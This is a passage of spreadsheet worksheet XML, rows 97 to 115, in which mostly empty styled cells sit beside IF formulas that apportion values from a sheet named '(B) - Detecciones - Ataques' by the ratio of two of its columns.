      <c r="EX97" s="745"/>
      <c r="EY97" s="745"/>
      <c r="EZ97" s="745"/>
      <c r="FA97" s="745"/>
      <c r="FB97" s="745"/>
      <c r="FC97" s="745"/>
      <c r="FD97" s="745"/>
      <c r="FE97" s="745"/>
      <c r="FF97" s="745"/>
      <c r="FG97" s="745"/>
      <c r="FH97" s="745"/>
      <c r="FI97" s="745"/>
      <c r="FJ97" s="745"/>
      <c r="FK97" s="745"/>
      <c r="FL97" s="745"/>
      <c r="FM97" s="745"/>
      <c r="FN97" s="745"/>
      <c r="FO97" s="745"/>
      <c r="FP97" s="745"/>
      <c r="FQ97" s="745"/>
      <c r="FR97" s="745"/>
      <c r="FS97" s="745"/>
      <c r="FT97" s="745"/>
      <c r="FU97" s="745"/>
    </row>
    <row r="98">
      <c r="EL98" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP89&lt;&gt;0,'(B) - Detecciones - Ataques'!IP89*'(B) - Detecciones - Ataques'!IL89/('(B) - Detecciones - Ataques'!IL89+'(B) - Detecciones - Ataques'!IN89),0)</f>
        <v>0</v>
      </c>
      <c r="EM98" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP89&lt;&gt;0,'(B) - Detecciones - Ataques'!IP89*'(B) - Detecciones - Ataques'!IN89/('(B) - Detecciones - Ataques'!IL89+'(B) - Detecciones - Ataques'!IN89),0)</f>
        <v>0</v>
      </c>
      <c r="EN98" s="626"/>
      <c r="EO98" s="626"/>
      <c r="EP98" s="744"/>
      <c r="EQ98" s="745"/>
      <c r="ER98" s="745"/>
      <c r="ES98" s="745"/>
      <c r="ET98" s="745"/>
      <c r="EU98" s="745"/>
      <c r="EV98" s="745"/>
      <c r="EW98" s="745"/>
      <c r="EX98" s="745"/>
      <c r="EY98" s="745"/>
      <c r="EZ98" s="745"/>
      <c r="FA98" s="745"/>
      <c r="FB98" s="745"/>
      <c r="FC98" s="745"/>
      <c r="FD98" s="745"/>
      <c r="FE98" s="745"/>
      <c r="FF98" s="745"/>
      <c r="FG98" s="745"/>
      <c r="FH98" s="745"/>
      <c r="FI98" s="745"/>
      <c r="FJ98" s="745"/>
      <c r="FK98" s="745"/>
      <c r="FL98" s="745"/>
      <c r="FM98" s="745"/>
      <c r="FN98" s="745"/>
      <c r="FO98" s="745"/>
      <c r="FP98" s="745"/>
      <c r="FQ98" s="745"/>
      <c r="FR98" s="745"/>
      <c r="FS98" s="745"/>
      <c r="FT98" s="745"/>
      <c r="FU98" s="745"/>
    </row>
    <row r="99">
      <c r="EL99" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP90&lt;&gt;0,'(B) - Detecciones - Ataques'!IP90*'(B) - Detecciones - Ataques'!IL90/('(B) - Detecciones - Ataques'!IL90+'(B) - Detecciones - Ataques'!IN90),0)</f>
        <v>0.5</v>
      </c>
      <c r="EM99" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP90&lt;&gt;0,'(B) - Detecciones - Ataques'!IP90*'(B) - Detecciones - Ataques'!IN90/('(B) - Detecciones - Ataques'!IL90+'(B) - Detecciones - Ataques'!IN90),0)</f>
        <v>0.5</v>
      </c>
      <c r="EN99" s="626"/>
      <c r="EO99" s="626"/>
      <c r="EP99" s="744"/>
      <c r="EQ99" s="745"/>
      <c r="ER99" s="745"/>
      <c r="ES99" s="745"/>
      <c r="ET99" s="745"/>
      <c r="EU99" s="745"/>
      <c r="EV99" s="745"/>
      <c r="EW99" s="745"/>
      <c r="EX99" s="745"/>
      <c r="EY99" s="745"/>
      <c r="EZ99" s="745"/>
      <c r="FA99" s="745"/>
      <c r="FB99" s="745"/>
      <c r="FC99" s="745"/>
      <c r="FD99" s="745"/>
      <c r="FE99" s="745"/>
      <c r="FF99" s="745"/>
      <c r="FG99" s="745"/>
      <c r="FH99" s="745"/>
      <c r="FI99" s="745"/>
      <c r="FJ99" s="745"/>
      <c r="FK99" s="745"/>
      <c r="FL99" s="745"/>
      <c r="FM99" s="745"/>
      <c r="FN99" s="745"/>
      <c r="FO99" s="745"/>
      <c r="FP99" s="745"/>
      <c r="FQ99" s="745"/>
      <c r="FR99" s="745"/>
      <c r="FS99" s="745"/>
      <c r="FT99" s="745"/>
      <c r="FU99" s="745"/>
    </row>
    <row r="100">
      <c r="EL100" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP91&lt;&gt;0,'(B) - Detecciones - Ataques'!IP91*'(B) - Detecciones - Ataques'!IL91/('(B) - Detecciones - Ataques'!IL91+'(B) - Detecciones - Ataques'!IN91),0)</f>
        <v>0</v>
      </c>
      <c r="EM100" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP91&lt;&gt;0,'(B) - Detecciones - Ataques'!IP91*'(B) - Detecciones - Ataques'!IN91/('(B) - Detecciones - Ataques'!IL91+'(B) - Detecciones - Ataques'!IN91),0)</f>
        <v>0</v>
      </c>
      <c r="EN100" s="626"/>
      <c r="EO100" s="626"/>
      <c r="EP100" s="744"/>
      <c r="EQ100" s="745"/>
      <c r="ER100" s="745"/>
      <c r="ES100" s="745"/>
      <c r="ET100" s="745"/>
      <c r="EU100" s="745"/>
      <c r="EV100" s="745"/>
      <c r="EW100" s="745"/>
      <c r="EX100" s="745"/>
      <c r="EY100" s="745"/>
      <c r="EZ100" s="745"/>
      <c r="FA100" s="745"/>
      <c r="FB100" s="745"/>
      <c r="FC100" s="745"/>
      <c r="FD100" s="745"/>
      <c r="FE100" s="745"/>
      <c r="FF100" s="745"/>
      <c r="FG100" s="745"/>
      <c r="FH100" s="745"/>
      <c r="FI100" s="745"/>
      <c r="FJ100" s="745"/>
      <c r="FK100" s="745"/>
      <c r="FL100" s="745"/>
      <c r="FM100" s="745"/>
      <c r="FN100" s="745"/>
      <c r="FO100" s="745"/>
      <c r="FP100" s="745"/>
      <c r="FQ100" s="745"/>
      <c r="FR100" s="745"/>
      <c r="FS100" s="745"/>
      <c r="FT100" s="745"/>
      <c r="FU100" s="745"/>
    </row>
    <row r="101">
      <c r="EL101" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP92&lt;&gt;0,'(B) - Detecciones - Ataques'!IP92*'(B) - Detecciones - Ataques'!IL92/('(B) - Detecciones - Ataques'!IL92+'(B) - Detecciones - Ataques'!IN92),0)</f>
        <v>1</v>
      </c>
      <c r="EM101" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP92&lt;&gt;0,'(B) - Detecciones - Ataques'!IP92*'(B) - Detecciones - Ataques'!IN92/('(B) - Detecciones - Ataques'!IL92+'(B) - Detecciones - Ataques'!IN92),0)</f>
        <v>0</v>
      </c>
      <c r="EN101" s="626"/>
      <c r="EO101" s="626"/>
      <c r="EP101" s="744"/>
      <c r="EQ101" s="745"/>
      <c r="ER101" s="745"/>
      <c r="ES101" s="745"/>
      <c r="ET101" s="745"/>
      <c r="EU101" s="745"/>
      <c r="EV101" s="745"/>
      <c r="EW101" s="745"/>
      <c r="EX101" s="745"/>
      <c r="EY101" s="745"/>
      <c r="EZ101" s="745"/>
      <c r="FA101" s="745"/>
      <c r="FB101" s="745"/>
      <c r="FC101" s="745"/>
      <c r="FD101" s="745"/>
      <c r="FE101" s="745"/>
      <c r="FF101" s="745"/>
      <c r="FG101" s="745"/>
      <c r="FH101" s="745"/>
      <c r="FI101" s="745"/>
      <c r="FJ101" s="745"/>
      <c r="FK101" s="745"/>
      <c r="FL101" s="745"/>
      <c r="FM101" s="745"/>
      <c r="FN101" s="745"/>
      <c r="FO101" s="745"/>
      <c r="FP101" s="745"/>
      <c r="FQ101" s="745"/>
      <c r="FR101" s="745"/>
      <c r="FS101" s="745"/>
      <c r="FT101" s="745"/>
      <c r="FU101" s="745"/>
    </row>
    <row r="102">
      <c r="EL102" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP93&lt;&gt;0,'(B) - Detecciones - Ataques'!IP93*'(B) - Detecciones - Ataques'!IL93/('(B) - Detecciones - Ataques'!IL93+'(B) - Detecciones - Ataques'!IN93),0)</f>
        <v>1</v>
      </c>
      <c r="EM102" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP93&lt;&gt;0,'(B) - Detecciones - Ataques'!IP93*'(B) - Detecciones - Ataques'!IN93/('(B) - Detecciones - Ataques'!IL93+'(B) - Detecciones - Ataques'!IN93),0)</f>
        <v>0</v>
      </c>
      <c r="EN102" s="626"/>
      <c r="EO102" s="626"/>
      <c r="EP102" s="744"/>
      <c r="EQ102" s="745"/>
      <c r="ER102" s="745"/>
      <c r="ES102" s="745"/>
      <c r="ET102" s="745"/>
      <c r="EU102" s="745"/>
      <c r="EV102" s="745"/>
      <c r="EW102" s="745"/>
      <c r="EX102" s="745"/>
      <c r="EY102" s="745"/>
      <c r="EZ102" s="745"/>
      <c r="FA102" s="745"/>
      <c r="FB102" s="745"/>
      <c r="FC102" s="745"/>
      <c r="FD102" s="745"/>
      <c r="FE102" s="745"/>
      <c r="FF102" s="745"/>
      <c r="FG102" s="745"/>
      <c r="FH102" s="745"/>
      <c r="FI102" s="745"/>
      <c r="FJ102" s="745"/>
      <c r="FK102" s="745"/>
      <c r="FL102" s="745"/>
      <c r="FM102" s="745"/>
      <c r="FN102" s="745"/>
      <c r="FO102" s="745"/>
      <c r="FP102" s="745"/>
      <c r="FQ102" s="745"/>
      <c r="FR102" s="745"/>
      <c r="FS102" s="745"/>
      <c r="FT102" s="745"/>
      <c r="FU102" s="745"/>
    </row>
    <row r="103">
      <c r="EL103" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP94&lt;&gt;0,'(B) - Detecciones - Ataques'!IP94*'(B) - Detecciones - Ataques'!IL94/('(B) - Detecciones - Ataques'!IL94+'(B) - Detecciones - Ataques'!IN94),0)</f>
        <v>1</v>
      </c>
      <c r="EM103" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP94&lt;&gt;0,'(B) - Detecciones - Ataques'!IP94*'(B) - Detecciones - Ataques'!IN94/('(B) - Detecciones - Ataques'!IL94+'(B) - Detecciones - Ataques'!IN94),0)</f>
        <v>0</v>
      </c>
      <c r="EN103" s="626"/>
      <c r="EO103" s="626"/>
      <c r="EP103" s="744"/>
      <c r="EQ103" s="745"/>
      <c r="ER103" s="745"/>
      <c r="ES103" s="745"/>
      <c r="ET103" s="745"/>
      <c r="EU103" s="745"/>
      <c r="EV103" s="745"/>
      <c r="EW103" s="745"/>
      <c r="EX103" s="745"/>
      <c r="EY103" s="745"/>
      <c r="EZ103" s="745"/>
      <c r="FA103" s="745"/>
      <c r="FB103" s="745"/>
      <c r="FC103" s="745"/>
      <c r="FD103" s="745"/>
      <c r="FE103" s="745"/>
      <c r="FF103" s="745"/>
      <c r="FG103" s="745"/>
      <c r="FH103" s="745"/>
      <c r="FI103" s="745"/>
      <c r="FJ103" s="745"/>
      <c r="FK103" s="745"/>
      <c r="FL103" s="745"/>
      <c r="FM103" s="745"/>
      <c r="FN103" s="745"/>
      <c r="FO103" s="745"/>
      <c r="FP103" s="745"/>
      <c r="FQ103" s="745"/>
      <c r="FR103" s="745"/>
      <c r="FS103" s="745"/>
      <c r="FT103" s="745"/>
      <c r="FU103" s="745"/>
    </row>
    <row r="104">
      <c r="EL104" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP95&lt;&gt;0,'(B) - Detecciones - Ataques'!IP95*'(B) - Detecciones - Ataques'!IL95/('(B) - Detecciones - Ataques'!IL95+'(B) - Detecciones - Ataques'!IN95),0)</f>
        <v>1</v>
      </c>
      <c r="EM104" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP95&lt;&gt;0,'(B) - Detecciones - Ataques'!IP95*'(B) - Detecciones - Ataques'!IN95/('(B) - Detecciones - Ataques'!IL95+'(B) - Detecciones - Ataques'!IN95),0)</f>
        <v>0</v>
      </c>
      <c r="EN104" s="626"/>
      <c r="EO104" s="626"/>
      <c r="EP104" s="744"/>
      <c r="EQ104" s="745"/>
      <c r="ER104" s="745"/>
      <c r="ES104" s="745"/>
      <c r="ET104" s="745"/>
      <c r="EU104" s="745"/>
      <c r="EV104" s="745"/>
      <c r="EW104" s="745"/>
      <c r="EX104" s="745"/>
      <c r="EY104" s="745"/>
      <c r="EZ104" s="745"/>
      <c r="FA104" s="745"/>
      <c r="FB104" s="745"/>
      <c r="FC104" s="745"/>
      <c r="FD104" s="745"/>
      <c r="FE104" s="745"/>
      <c r="FF104" s="745"/>
      <c r="FG104" s="745"/>
      <c r="FH104" s="745"/>
      <c r="FI104" s="745"/>
      <c r="FJ104" s="745"/>
      <c r="FK104" s="745"/>
      <c r="FL104" s="745"/>
      <c r="FM104" s="745"/>
      <c r="FN104" s="745"/>
      <c r="FO104" s="745"/>
      <c r="FP104" s="745"/>
      <c r="FQ104" s="745"/>
      <c r="FR104" s="745"/>
      <c r="FS104" s="745"/>
      <c r="FT104" s="745"/>
      <c r="FU104" s="745"/>
    </row>
    <row r="105">
      <c r="EL105" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP96&lt;&gt;0,'(B) - Detecciones - Ataques'!IP96*'(B) - Detecciones - Ataques'!IL96/('(B) - Detecciones - Ataques'!IL96+'(B) - Detecciones - Ataques'!IN96),0)</f>
        <v>1</v>
      </c>
      <c r="EM105" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP96&lt;&gt;0,'(B) - Detecciones - Ataques'!IP96*'(B) - Detecciones - Ataques'!IN96/('(B) - Detecciones - Ataques'!IL96+'(B) - Detecciones - Ataques'!IN96),0)</f>
        <v>0</v>
      </c>
      <c r="EN105" s="626"/>
      <c r="EO105" s="626"/>
      <c r="EP105" s="744"/>
      <c r="EQ105" s="745"/>
      <c r="ER105" s="745"/>
      <c r="ES105" s="745"/>
      <c r="ET105" s="745"/>
      <c r="EU105" s="745"/>
      <c r="EV105" s="745"/>
      <c r="EW105" s="745"/>
      <c r="EX105" s="745"/>
      <c r="EY105" s="745"/>
      <c r="EZ105" s="745"/>
      <c r="FA105" s="745"/>
      <c r="FB105" s="745"/>
      <c r="FC105" s="745"/>
      <c r="FD105" s="745"/>
      <c r="FE105" s="745"/>
      <c r="FF105" s="745"/>
      <c r="FG105" s="745"/>
      <c r="FH105" s="745"/>
      <c r="FI105" s="745"/>
      <c r="FJ105" s="745"/>
      <c r="FK105" s="745"/>
      <c r="FL105" s="745"/>
      <c r="FM105" s="745"/>
      <c r="FN105" s="745"/>
      <c r="FO105" s="745"/>
      <c r="FP105" s="745"/>
      <c r="FQ105" s="745"/>
      <c r="FR105" s="745"/>
      <c r="FS105" s="745"/>
      <c r="FT105" s="745"/>
      <c r="FU105" s="745"/>
    </row>
    <row r="106">
      <c r="EL106" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP97&lt;&gt;0,'(B) - Detecciones - Ataques'!IP97*'(B) - Detecciones - Ataques'!IL97/('(B) - Detecciones - Ataques'!IL97+'(B) - Detecciones - Ataques'!IN97),0)</f>
        <v>0</v>
      </c>
      <c r="EM106" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP97&lt;&gt;0,'(B) - Detecciones - Ataques'!IP97*'(B) - Detecciones - Ataques'!IN97/('(B) - Detecciones - Ataques'!IL97+'(B) - Detecciones - Ataques'!IN97),0)</f>
        <v>0</v>
      </c>
      <c r="EN106" s="626"/>
      <c r="EO106" s="626"/>
      <c r="EP106" s="744"/>
      <c r="EQ106" s="745"/>
      <c r="ER106" s="745"/>
      <c r="ES106" s="745"/>
      <c r="ET106" s="745"/>
      <c r="EU106" s="745"/>
      <c r="EV106" s="745"/>
      <c r="EW106" s="745"/>
      <c r="EX106" s="745"/>
      <c r="EY106" s="745"/>
      <c r="EZ106" s="745"/>
      <c r="FA106" s="745"/>
      <c r="FB106" s="745"/>
      <c r="FC106" s="745"/>
      <c r="FD106" s="745"/>
      <c r="FE106" s="745"/>
      <c r="FF106" s="745"/>
      <c r="FG106" s="745"/>
      <c r="FH106" s="745"/>
      <c r="FI106" s="745"/>
      <c r="FJ106" s="745"/>
      <c r="FK106" s="745"/>
      <c r="FL106" s="745"/>
      <c r="FM106" s="745"/>
      <c r="FN106" s="745"/>
      <c r="FO106" s="745"/>
      <c r="FP106" s="745"/>
      <c r="FQ106" s="745"/>
      <c r="FR106" s="745"/>
      <c r="FS106" s="745"/>
      <c r="FT106" s="745"/>
      <c r="FU106" s="745"/>
    </row>
    <row r="107">
      <c r="EL107" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP98&lt;&gt;0,'(B) - Detecciones - Ataques'!IP98*'(B) - Detecciones - Ataques'!IL98/('(B) - Detecciones - Ataques'!IL98+'(B) - Detecciones - Ataques'!IN98),0)</f>
        <v>0</v>
      </c>
      <c r="EM107" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP98&lt;&gt;0,'(B) - Detecciones - Ataques'!IP98*'(B) - Detecciones - Ataques'!IN98/('(B) - Detecciones - Ataques'!IL98+'(B) - Detecciones - Ataques'!IN98),0)</f>
        <v>0</v>
      </c>
      <c r="EN107" s="626"/>
      <c r="EO107" s="626"/>
      <c r="EP107" s="744"/>
      <c r="EQ107" s="745"/>
      <c r="ER107" s="745"/>
      <c r="ES107" s="745"/>
      <c r="ET107" s="745"/>
      <c r="EU107" s="745"/>
      <c r="EV107" s="745"/>
      <c r="EW107" s="745"/>
      <c r="EX107" s="745"/>
      <c r="EY107" s="745"/>
      <c r="EZ107" s="745"/>
      <c r="FA107" s="745"/>
      <c r="FB107" s="745"/>
      <c r="FC107" s="745"/>
      <c r="FD107" s="745"/>
      <c r="FE107" s="745"/>
      <c r="FF107" s="745"/>
      <c r="FG107" s="745"/>
      <c r="FH107" s="745"/>
      <c r="FI107" s="745"/>
      <c r="FJ107" s="745"/>
      <c r="FK107" s="745"/>
      <c r="FL107" s="745"/>
      <c r="FM107" s="745"/>
      <c r="FN107" s="745"/>
      <c r="FO107" s="745"/>
      <c r="FP107" s="745"/>
      <c r="FQ107" s="745"/>
      <c r="FR107" s="745"/>
      <c r="FS107" s="745"/>
      <c r="FT107" s="745"/>
      <c r="FU107" s="745"/>
    </row>
    <row r="108">
      <c r="EL108" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP99&lt;&gt;0,'(B) - Detecciones - Ataques'!IP99*'(B) - Detecciones - Ataques'!IL99/('(B) - Detecciones - Ataques'!IL99+'(B) - Detecciones - Ataques'!IN99),0)</f>
        <v>0</v>
      </c>
      <c r="EM108" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP99&lt;&gt;0,'(B) - Detecciones - Ataques'!IP99*'(B) - Detecciones - Ataques'!IN99/('(B) - Detecciones - Ataques'!IL99+'(B) - Detecciones - Ataques'!IN99),0)</f>
        <v>0</v>
      </c>
      <c r="EN108" s="626"/>
      <c r="EO108" s="626"/>
      <c r="EP108" s="744"/>
      <c r="EQ108" s="745"/>
      <c r="ER108" s="745"/>
      <c r="ES108" s="745"/>
      <c r="ET108" s="745"/>
      <c r="EU108" s="745"/>
      <c r="EV108" s="745"/>
      <c r="EW108" s="745"/>
      <c r="EX108" s="745"/>
      <c r="EY108" s="745"/>
      <c r="EZ108" s="745"/>
      <c r="FA108" s="745"/>
      <c r="FB108" s="745"/>
      <c r="FC108" s="745"/>
      <c r="FD108" s="745"/>
      <c r="FE108" s="745"/>
      <c r="FF108" s="745"/>
      <c r="FG108" s="745"/>
      <c r="FH108" s="745"/>
      <c r="FI108" s="745"/>
      <c r="FJ108" s="745"/>
      <c r="FK108" s="745"/>
      <c r="FL108" s="745"/>
      <c r="FM108" s="745"/>
      <c r="FN108" s="745"/>
      <c r="FO108" s="745"/>
      <c r="FP108" s="745"/>
      <c r="FQ108" s="745"/>
      <c r="FR108" s="745"/>
      <c r="FS108" s="745"/>
      <c r="FT108" s="745"/>
      <c r="FU108" s="745"/>
    </row>
    <row r="109">
      <c r="EL109" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP100&lt;&gt;0,'(B) - Detecciones - Ataques'!IP100*'(B) - Detecciones - Ataques'!IL100/('(B) - Detecciones - Ataques'!IL100+'(B) - Detecciones - Ataques'!IN100),0)</f>
        <v>0</v>
      </c>
      <c r="EM109" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP100&lt;&gt;0,'(B) - Detecciones - Ataques'!IP100*'(B) - Detecciones - Ataques'!IN100/('(B) - Detecciones - Ataques'!IL100+'(B) - Detecciones - Ataques'!IN100),0)</f>
        <v>0</v>
      </c>
      <c r="EN109" s="626"/>
      <c r="EO109" s="626"/>
      <c r="EP109" s="744"/>
      <c r="EQ109" s="745"/>
      <c r="ER109" s="745"/>
      <c r="ES109" s="745"/>
      <c r="ET109" s="745"/>
      <c r="EU109" s="745"/>
      <c r="EV109" s="745"/>
      <c r="EW109" s="745"/>
      <c r="EX109" s="745"/>
      <c r="EY109" s="745"/>
      <c r="EZ109" s="745"/>
      <c r="FA109" s="745"/>
      <c r="FB109" s="745"/>
      <c r="FC109" s="745"/>
      <c r="FD109" s="745"/>
      <c r="FE109" s="745"/>
      <c r="FF109" s="745"/>
      <c r="FG109" s="745"/>
      <c r="FH109" s="745"/>
      <c r="FI109" s="745"/>
      <c r="FJ109" s="745"/>
      <c r="FK109" s="745"/>
      <c r="FL109" s="745"/>
      <c r="FM109" s="745"/>
      <c r="FN109" s="745"/>
      <c r="FO109" s="745"/>
      <c r="FP109" s="745"/>
      <c r="FQ109" s="745"/>
      <c r="FR109" s="745"/>
      <c r="FS109" s="745"/>
      <c r="FT109" s="745"/>
      <c r="FU109" s="745"/>
    </row>
    <row r="110">
      <c r="EL110" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP101&lt;&gt;0,'(B) - Detecciones - Ataques'!IP101*'(B) - Detecciones - Ataques'!IL101/('(B) - Detecciones - Ataques'!IL101+'(B) - Detecciones - Ataques'!IN101),0)</f>
        <v>0</v>
      </c>
      <c r="EM110" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP101&lt;&gt;0,'(B) - Detecciones - Ataques'!IP101*'(B) - Detecciones - Ataques'!IN101/('(B) - Detecciones - Ataques'!IL101+'(B) - Detecciones - Ataques'!IN101),0)</f>
        <v>0</v>
      </c>
      <c r="EN110" s="626"/>
      <c r="EO110" s="626"/>
      <c r="EP110" s="744"/>
      <c r="EQ110" s="745"/>
      <c r="ER110" s="745"/>
      <c r="ES110" s="745"/>
      <c r="ET110" s="745"/>
      <c r="EU110" s="745"/>
      <c r="EV110" s="745"/>
      <c r="EW110" s="745"/>
      <c r="EX110" s="745"/>
      <c r="EY110" s="745"/>
      <c r="EZ110" s="745"/>
      <c r="FA110" s="745"/>
      <c r="FB110" s="745"/>
      <c r="FC110" s="745"/>
      <c r="FD110" s="745"/>
      <c r="FE110" s="745"/>
      <c r="FF110" s="745"/>
      <c r="FG110" s="745"/>
      <c r="FH110" s="745"/>
      <c r="FI110" s="745"/>
      <c r="FJ110" s="745"/>
      <c r="FK110" s="745"/>
      <c r="FL110" s="745"/>
      <c r="FM110" s="745"/>
      <c r="FN110" s="745"/>
      <c r="FO110" s="745"/>
      <c r="FP110" s="745"/>
      <c r="FQ110" s="745"/>
      <c r="FR110" s="745"/>
      <c r="FS110" s="745"/>
      <c r="FT110" s="745"/>
      <c r="FU110" s="745"/>
    </row>
    <row r="111">
      <c r="EL111" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP102&lt;&gt;0,'(B) - Detecciones - Ataques'!IP102*'(B) - Detecciones - Ataques'!IL102/('(B) - Detecciones - Ataques'!IL102+'(B) - Detecciones - Ataques'!IN102),0)</f>
        <v>0</v>
      </c>
      <c r="EM111" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP102&lt;&gt;0,'(B) - Detecciones - Ataques'!IP102*'(B) - Detecciones - Ataques'!IN102/('(B) - Detecciones - Ataques'!IL102+'(B) - Detecciones - Ataques'!IN102),0)</f>
        <v>0</v>
      </c>
      <c r="EN111" s="626"/>
      <c r="EO111" s="626"/>
      <c r="EP111" s="744"/>
      <c r="EQ111" s="745"/>
      <c r="ER111" s="745"/>
      <c r="ES111" s="745"/>
      <c r="ET111" s="745"/>
      <c r="EU111" s="745"/>
      <c r="EV111" s="745"/>
      <c r="EW111" s="745"/>
      <c r="EX111" s="745"/>
      <c r="EY111" s="745"/>
      <c r="EZ111" s="745"/>
      <c r="FA111" s="745"/>
      <c r="FB111" s="745"/>
      <c r="FC111" s="745"/>
      <c r="FD111" s="745"/>
      <c r="FE111" s="745"/>
      <c r="FF111" s="745"/>
      <c r="FG111" s="745"/>
      <c r="FH111" s="745"/>
      <c r="FI111" s="745"/>
      <c r="FJ111" s="745"/>
      <c r="FK111" s="745"/>
      <c r="FL111" s="745"/>
      <c r="FM111" s="745"/>
      <c r="FN111" s="745"/>
      <c r="FO111" s="745"/>
      <c r="FP111" s="745"/>
      <c r="FQ111" s="745"/>
      <c r="FR111" s="745"/>
      <c r="FS111" s="745"/>
      <c r="FT111" s="745"/>
      <c r="FU111" s="745"/>
    </row>
    <row r="112">
      <c r="EL112" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP103&lt;&gt;0,'(B) - Detecciones - Ataques'!IP103*'(B) - Detecciones - Ataques'!IL103/('(B) - Detecciones - Ataques'!IL103+'(B) - Detecciones - Ataques'!IN103),0)</f>
        <v>0</v>
      </c>
      <c r="EM112" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP103&lt;&gt;0,'(B) - Detecciones - Ataques'!IP103*'(B) - Detecciones - Ataques'!IN103/('(B) - Detecciones - Ataques'!IL103+'(B) - Detecciones - Ataques'!IN103),0)</f>
        <v>0</v>
      </c>
      <c r="EN112" s="626"/>
      <c r="EO112" s="626"/>
      <c r="EP112" s="762"/>
      <c r="EQ112" s="762"/>
      <c r="ER112" s="762"/>
      <c r="ES112" s="762"/>
      <c r="ET112" s="762"/>
      <c r="EU112" s="762"/>
      <c r="EV112" s="762"/>
      <c r="EW112" s="762"/>
      <c r="EX112" s="762"/>
      <c r="EY112" s="762"/>
      <c r="EZ112" s="762"/>
      <c r="FA112" s="762"/>
      <c r="FB112" s="762"/>
      <c r="FC112" s="762"/>
      <c r="FD112" s="762"/>
      <c r="FE112" s="762"/>
      <c r="FF112" s="762"/>
      <c r="FG112" s="762"/>
      <c r="FH112" s="762"/>
      <c r="FI112" s="762"/>
      <c r="FJ112" s="762"/>
      <c r="FK112" s="762"/>
      <c r="FL112" s="762"/>
      <c r="FM112" s="762"/>
      <c r="FN112" s="762"/>
      <c r="FO112" s="762"/>
      <c r="FP112" s="762"/>
      <c r="FQ112" s="762"/>
      <c r="FR112" s="762"/>
      <c r="FS112" s="762"/>
      <c r="FT112" s="762"/>
      <c r="FU112" s="762"/>
    </row>
    <row r="113">
      <c r="EL113" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP104&lt;&gt;0,'(B) - Detecciones - Ataques'!IP104*'(B) - Detecciones - Ataques'!IL104/('(B) - Detecciones - Ataques'!IL104+'(B) - Detecciones - Ataques'!IN104),0)</f>
        <v>0</v>
      </c>
      <c r="EM113" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP104&lt;&gt;0,'(B) - Detecciones - Ataques'!IP104*'(B) - Detecciones - Ataques'!IN104/('(B) - Detecciones - Ataques'!IL104+'(B) - Detecciones - Ataques'!IN104),0)</f>
        <v>0</v>
      </c>
      <c r="EN113" s="626"/>
      <c r="EO113" s="626"/>
      <c r="EP113" s="762"/>
      <c r="EQ113" s="762"/>
      <c r="ER113" s="762"/>
      <c r="ES113" s="762"/>
      <c r="ET113" s="762"/>
      <c r="EU113" s="762"/>
      <c r="EV113" s="762"/>
      <c r="EW113" s="762"/>
      <c r="EX113" s="762"/>
      <c r="EY113" s="762"/>
      <c r="EZ113" s="762"/>
      <c r="FA113" s="762"/>
      <c r="FB113" s="762"/>
      <c r="FC113" s="762"/>
      <c r="FD113" s="762"/>
      <c r="FE113" s="762"/>
      <c r="FF113" s="762"/>
      <c r="FG113" s="762"/>
      <c r="FH113" s="762"/>
      <c r="FI113" s="762"/>
      <c r="FJ113" s="762"/>
      <c r="FK113" s="762"/>
      <c r="FL113" s="762"/>
      <c r="FM113" s="762"/>
      <c r="FN113" s="762"/>
      <c r="FO113" s="762"/>
      <c r="FP113" s="762"/>
      <c r="FQ113" s="762"/>
      <c r="FR113" s="762"/>
      <c r="FS113" s="762"/>
      <c r="FT113" s="762"/>
      <c r="FU113" s="762"/>
    </row>
    <row r="114">
      <c r="EL114" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP105&lt;&gt;0,'(B) - Detecciones - Ataques'!IP105*'(B) - Detecciones - Ataques'!IL105/('(B) - Detecciones - Ataques'!IL105+'(B) - Detecciones - Ataques'!IN105),0)</f>
        <v>0</v>
      </c>
      <c r="EM114" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP105&lt;&gt;0,'(B) - Detecciones - Ataques'!IP105*'(B) - Detecciones - Ataques'!IN105/('(B) - Detecciones - Ataques'!IL105+'(B) - Detecciones - Ataques'!IN105),0)</f>
        <v>0</v>
      </c>
      <c r="EN114" s="626"/>
      <c r="EO114" s="626"/>
      <c r="EP114" s="762"/>
      <c r="EQ114" s="762"/>
      <c r="ER114" s="762"/>
      <c r="ES114" s="762"/>
      <c r="ET114" s="722"/>
      <c r="EU114" s="722"/>
    </row>
    <row r="115">
      <c r="EL115" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP106&lt;&gt;0,'(B) - Detecciones - Ataques'!IP106*'(B) - Detecciones - Ataques'!IL106/('(B) - Detecciones - Ataques'!IL106+'(B) - Detecciones - Ataques'!IN106),0)</f>
        <v>0</v>
      </c>
      <c r="EM115" s="626">
